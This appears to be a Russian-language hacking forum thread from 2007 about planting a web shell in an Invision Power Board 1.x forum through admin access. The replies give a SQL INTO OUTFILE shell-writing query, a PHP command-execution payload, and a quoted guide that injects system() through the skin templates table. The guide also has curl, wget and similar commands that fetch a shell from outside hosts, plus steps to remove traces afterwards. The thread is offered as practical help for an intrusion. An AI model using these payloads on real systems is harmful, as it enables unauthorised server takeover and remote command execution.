HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Несколько вопросов по IPB
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Несколько вопросов по IPB
  #1  
Старый 17.05.2007, 23:37
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
С нами: 10602901

Репутация: 11
По умолчанию Несколько вопросов по IPB
В общем есть форум ипб 1.3
есть доступ к админке
Но...
нельзя залиться через смайлы

не могу через скуль залить в аплоадс (пишет что доступ запрещен)

через шаблоны выдает: "Этот файл является неправильным файлом шаблона для Invision Power Board"

Не смог понять как воспользоваться скулей типа
Код:
CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;  INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);  SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`  DROP TABLE `ibf_shell`
какой именно пхп-код нужен и путь/имя файла чего именно?

Ах да. http запрос тоже не проходит


Люди добрые помогите плз. С меня плюсы
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 18.05.2007, 01:37
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию
php-code: system($_GET["cmd"]);

путь до папки аплоадс ( найдешь в генеральных настройках)
 
Ответить с цитированием

  #3  
Старый 18.05.2007, 08:32
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
С нами: 10602901

Репутация: 11
По умолчанию
Спасибо но не прокатило.
Выдал что
Код:
Access denied for user: 'тра-та-та@localhost' (Using password: YES)
Последний раз редактировалось anakreon; 18.05.2007 в 08:36..
 
Ответить с цитированием

  #4  
Старый 18.05.2007, 15:01
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию
у тебя нет прав, как правило они только у рута
Последний раз редактировалось maxster; 18.05.2007 в 15:04..
 
Ответить с цитированием

  #5  
Старый 18.05.2007, 21:07
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
С нами: 10602901

Репутация: 11
По умолчанию
ну это понятно. И какой же выход?
 
Ответить с цитированием

  #6  
Старый 18.05.2007, 23:28
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию
Код:
Привет, я DeusTirael.
Сейчас я покажу как можно залить шелл в ИПБ 1.* если не катит способ через смайлы.

Заходим в админку, выбираем SQL Management > mySQL Toolbox > 120_skin_templates

Нужно в столбце func_name изменить значение calendar_start_form 
на "aaa(){}}; system($_REQUEST[c]); class qwerty{function ggg"

Для этого делаем один запрос:
update 120_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";

Теперь ставим Use safe mode skins? > Yes

Готово! Заходим в календарь и в параметре 'c' передаем команды.

Заливаем нормальный шелл:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
get http://test2.ru/shells/rst.txt > uploads/sh.php

Чистим после себя:
Use safe mode skins? > No
update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb";
18.03.2007 by DeusTirael специально для DaMaGeLaB.OrG
Видео использовать только в целях ознакомления.
 
Ответить с цитированием

  #7  
Старый 19.05.2007, 08:48
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
С нами: 10602901

Репутация: 11
По умолчанию
Это я тоже делал. Тоже не катит. Выплевывает ошибку при смене safemod skins > да
Код:
Грубая ошибка: Невозможно произвести запись в файл conf_global - изменения не сохранены. Попробуйте изменить атрибут CHMOD на 0777
 
Ответить с цитированием

  #8  
Старый 19.05.2007, 21:27
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки
 
Ответить с цитированием

  #9  
Старый 19.05.2007, 23:33
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию
Цитата:
Сообщение от Doom123  
http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки
Способ не актуален для ипб 1.*, он только для 2.*.*
 
Ответить с цитированием

  #10  
Старый 20.05.2007, 00:03
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
да извените проморгал версию форума...
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
скрипт распознавания форума genom-- Уязвимости CMS / форумов 22 31.12.2008 15:06
Proxifier - несколько вопросов Driver Анонимность 2 16.07.2006 20:35
Несколько вопросов по IPB 2.0.4 Vilen Уязвимости CMS / форумов 1 01.07.2006 15:19
Несколько вопросов по форуму phpBB 2.0.11 limbonic Уязвимости CMS / форумов 29 05.04.2005 13:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.